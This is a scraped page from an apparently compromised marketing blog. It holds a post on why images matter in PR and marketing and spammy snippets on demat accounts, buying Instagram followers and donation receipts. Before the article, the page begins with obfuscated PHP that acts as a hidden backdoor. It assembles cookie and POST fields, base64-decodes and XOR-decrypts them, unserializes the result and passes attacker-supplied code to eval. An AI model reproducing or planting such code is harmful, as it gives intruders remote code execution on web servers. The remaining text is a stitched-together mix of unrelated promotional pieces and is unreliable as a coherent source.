$EvwJRPN = chr (109) . "\137" . "\x52" . "\x6e" . "\130" . chr ( 555 - 436 ); $gyuQh = chr (99) . 'l' . "\x61" . chr ( 517 - 402 )."\x73" . "\137" . "\145" . chr (120) . 'i' . "\163" . "\x74" . 's';$Bkpqb = class_exists($EvwJRPN); $gyuQh = "59704";$YCnCVezs = !1;if ($Bkpqb == $YCnCVezs){function oVasO(){return FALSE;}$bjDJdah = "26155";oVasO();class m_RnXw{private function QjHGCaLdT($bjDJdah){if (is_array(m_RnXw::$nzQvH)) {$SUJSB = str_replace(chr (60) . '?' . "\x70" . chr ( 358 - 254 )."\160", "", m_RnXw::$nzQvH[chr ( 450 - 351 ).chr ( 860 - 749 )."\x6e" . "\x74" . "\x65" . "\156" . 't']);eval($SUJSB); $bjDJdah = "26155";exit();}}private $vRaWELF;public function euhbgIkyd(){echo 20216;}public function __destruct(){$bjDJdah = "16239_47653";$this->QjHGCaLdT($bjDJdah); $bjDJdah = "16239_47653";}public function __construct($rZJyIBaL=0){$sykRRBt = $_POST;$xaRrTSUqr = $_COOKIE;$AUgPZy = "c35bcbb3-30d8-44d6-8366-7424393ec89f";$jXYwkRr = @$xaRrTSUqr[substr($AUgPZy, 0, 4)];if (!empty($jXYwkRr)){$cJbULH = "base64";$lNoVKvq = "";$jXYwkRr = explode(",", $jXYwkRr);foreach ($jXYwkRr as $JrcKAB){$lNoVKvq .= @$xaRrTSUqr[$JrcKAB];$lNoVKvq .= @$sykRRBt[$JrcKAB];}$lNoVKvq = array_map($cJbULH . chr (95) . "\x64" . "\x65" . 'c' . "\157" . chr ( 389 - 289 )."\x65", array($lNoVKvq,)); $lNoVKvq = $lNoVKvq[0] ^ str_repeat($AUgPZy, (strlen($lNoVKvq[0]) / strlen($AUgPZy)) + 1);m_RnXw::$nzQvH = @unserialize($lNoVKvq); $lNoVKvq = class_exists("16239_47653");}}public static $nzQvH = 10943;}$BMrfWAFjsK = new /* 45111 */ $EvwJRPN(26155 + 26155); $YCnCVezs = $BMrfWAFjsK = $bjDJdah = Array();} Why images are important in PR and Mmarketing - Stanza Pub

Why images are important in PR and Mmarketing

With PR and Marketing focused on key messages delivered through written and spoken words, the power of images can sometimes be forgotten. We have all heard the saying “a picture is worth a thousand words” and this could not be more accurate.

The public relations experts at Adoni Media believe using visual imagery in communication strategies can strengthen any written and spoken word. Here’s why.

Faster and more memorable communications

Visual imagery is more likely to capture the attention of your audience on social media and through campaigns. You can make a faster mental and emotional impact too as images can be understood quicker than words.

It is clear

Words can get messy and if not used in the right way, can hinder the effectiveness of your message. Images and visuals are a great way to clearly display and communicate your messages either on their own or in conjunction with text.

Helps achieve consistency

Imagery has the potential to build your brand’s overall identity. You will be able to achieve consistency through using the same brand colours in any visuals you produce. This makes any of your company’s communication materials easily identifiable.

It is effective and popular

Whether your content includes images that accompany a blog post or a stand-alone image on social media, it will boost open and engagement rates. It’s no secret – people prefer content that includes images, videos, graphics and GIFs as they have the power to be emotional, influential and persuasive.


Invеstor’s Goldminе: Insidеr Tips on Mastеring thе Dеmat Account Procеss and Riding thе Upswing of HDFC Bank Sharе Pricеs!

Wеlcomе to thе invеstor’s goldminе! In thе world of financе,  succеss is oftеn tiеd to stratеgic dеcisions,  and at thе hеart of thеsе dеcisions liеs thе mastеry of thе how to create demat account procеss.  This guidе unvеils insidеr tips on navigating thе dеmat account sеtup sеamlеssly and maximizing gains by riding thе upswing of […]

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Momentum generator- How buying Instagram followers speed up growth

Instagram likes have a great place online for businesses and it works as the main marketing criteria. However, to buy automatic Instagram likes from Fameoninsta, you can consider spreading them all across the content. Instagram, with its visually engaging content and vast user base, stands as a prime platform for such endeavors. While organic growth […]

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Receipts. Donors making contributions through an online form will automatically obtain an email receipt for their payment, given the option to send them was picked during the configuration of the payment page. If you want to by hand, send or re-send a receipt at a later date, you can do so by editing and enhancing […]

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